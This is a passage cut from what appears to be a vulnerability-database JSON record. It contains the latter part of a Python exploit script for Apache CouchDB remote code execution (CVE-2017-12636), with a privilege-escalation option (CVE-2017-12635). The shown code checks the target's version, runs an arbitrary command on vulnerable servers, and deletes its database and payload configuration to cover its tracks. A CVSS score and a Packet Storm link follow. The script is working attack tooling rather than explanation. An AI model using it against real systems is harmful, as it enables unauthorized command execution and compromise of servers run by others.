Cleaning up.\") \n \n# Cleanup database \ntry: \nsession.delete(args.host + \"/god\") \nexcept requests.exceptions.HTTPError: \nerror(\"[-] Unable to remove database.\") \n \n# Cleanup payload \ntry: \nif version == 1: \nsession.delete(args.host + \"/_config/query_servers/cmd\") \nelse: \nhost = session.get(args.host + \"/_membership\").json()[\"all_nodes\"][0] \nsession.delete(args.host + \"/_node\" + host + \"/_config/query_servers/cmd\") \nexcept requests.exceptions.HTTPError: \nerror(\"[-] Unable to remove payload.\") \n \ndef main(): \nversion = getVersion() \nprint(\"[*] Detected CouchDB Version \" + version) \nvv = version.replace(\".\", \"\") \nv = int(version[0]) \nif v == 1 and int(vv) <= 170: \nexploit(v) \nelif v == 2 and int(vv) < 211: \nexploit(v) \nelse: \nprint(\"[-] Version \" + version + \" not vulnerable.\") \nsys.exit(0) \n \nif __name__ == \"__main__\": \nap = argparse.ArgumentParser( \ndescription=\"Apache CouchDB JSON Remote Code Execution Exploit (CVE-2017-12636)\") \nap.add_argument(\"host\", help=\"URL (Example: http://127.0.0.1:5984).\") \nap.add_argument(\"-c\", \"--cmd\", help=\"Command to run.\") \nap.add_argument(\"--priv\", help=\"Exploit privilege escalation (CVE-2017-12635).\", \naction=\"store_true\") \nap.add_argument(\"-u\", \"--user\", help=\"Admin username (Default: guest).\", \ndefault=\"guest\") \nap.add_argument(\"-p\", \"--password\", help=\"Admin password (Default: guest).\", \ndefault=\"guest\") \nargs = ap.parse_args() \nmain() \n \n \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/148273/apachecouchdb-exec.txt"}]}